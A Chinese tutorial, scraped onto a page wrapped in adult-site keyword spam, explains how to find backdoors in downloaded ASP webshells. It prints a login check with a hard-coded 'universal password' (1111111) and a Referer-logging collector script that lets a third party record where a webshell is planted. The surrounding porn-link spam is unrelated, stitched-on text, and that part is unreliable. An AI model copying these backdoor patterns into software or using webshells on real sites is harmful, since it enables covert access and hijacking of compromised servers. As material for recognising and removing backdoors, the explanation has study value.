久草最新视频-久草最新网址-久国产-久国产视频-天天插夜夜操-天天插一插

用簡單的asp木馬后門,來找asp木馬后門

    我等小菜自己寫不來asp馬,只能用大蝦寫的,但網上流傳的都不知道是幾手的了, 難免有些居心不良的人會在里面加后門。

    好不容易拿到個shell又被別人偷走了怎么甘心啊!所以在下完asp木馬后要先檢查有沒后門,通常加了后門的為了隱秘性,都會加密!所以首先我們要先解密 asp木馬解密工具解密后先檢查有無萬能密碼,也就是說就算你改了木馬的密碼,他也能用這個密碼來登錄

正常的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對不起,密碼驗證失敗!"

加有萬能密碼的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對不起,密碼驗證失敗!"

1111111就是傳說中的萬能密碼了。

找到萬能密碼代碼后把or request.form("pass")="1111111" 刪除就OK了!

下面來找馬大多數都喜歡用框架掛馬:

找到后刪了,到此asp后門就算剔除了!


下面教大家后門的原理:

這是一段收信的asp代碼將其保存為1.asp

以下是引用片段:
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

    代碼基本意思就是:“HTTP_REFERER” 鏈接到當前頁面的前一頁面的 URL 地址
簡單來說就是獲得webshell的地址然后記錄在bobo.txt這里文本里

上傳到空間比如 http://127.0.0.1/1.asp

以下是引用片段:

插到asp木馬中,那么別人訪問這個被掛了馬的asp木馬就會生成個bobo.txt里面就會有asp大馬的路徑了

我們學習他是為了更好的理解,大家千萬別用來整菜鳥!

北大青鳥網上報名
北大青鳥招生簡章
主站蜘蛛池模板: 日韩欧美不卡视频| 性色生活免费看性大片| 亚洲国产日产韩国欧美综合| 亚洲黄色影视| 午夜精品久久久久蜜桃| 青青青免费网站在线观看| 青青草99久久精品国产综合| 日韩有码在线视频| 亚洲国产精品成人精品软件| 亚洲欧美一级久久精品| 亚洲国产精品网站久久| 亚洲综合日韩欧美一区二区三| 亚洲瑟瑟网| 亚洲欧美日韩精品| 亚洲精品片| 亚洲福利影院| 人人爱人人看| 手机看片1024精品日韩| 日韩高清不卡| 亚洲一区二区三区夜色| 日本一区二区三区四区公司| 人妖另类重口免费观看| 色狠狠成人综合色| 手机看片1024精品国产| 欧美成人久久一级c片免费| 亚洲精品影视| 欧美成人亚洲综合精品欧美激情| 亚洲日本欧美产综合在线| 一本毛片| 一级久久| 亚洲欧美一区二区三区国产精品| 亚洲一区二区中文| 色偷偷久久| 日本αv| 日本人成年视频在线观看| 日本中文在线观看| 一级女人儆爱片| 亚洲经典在线中文字幕| 欧美一级特黄aa大片婷婷| 日本天堂网址| 欧美一级在线全免费|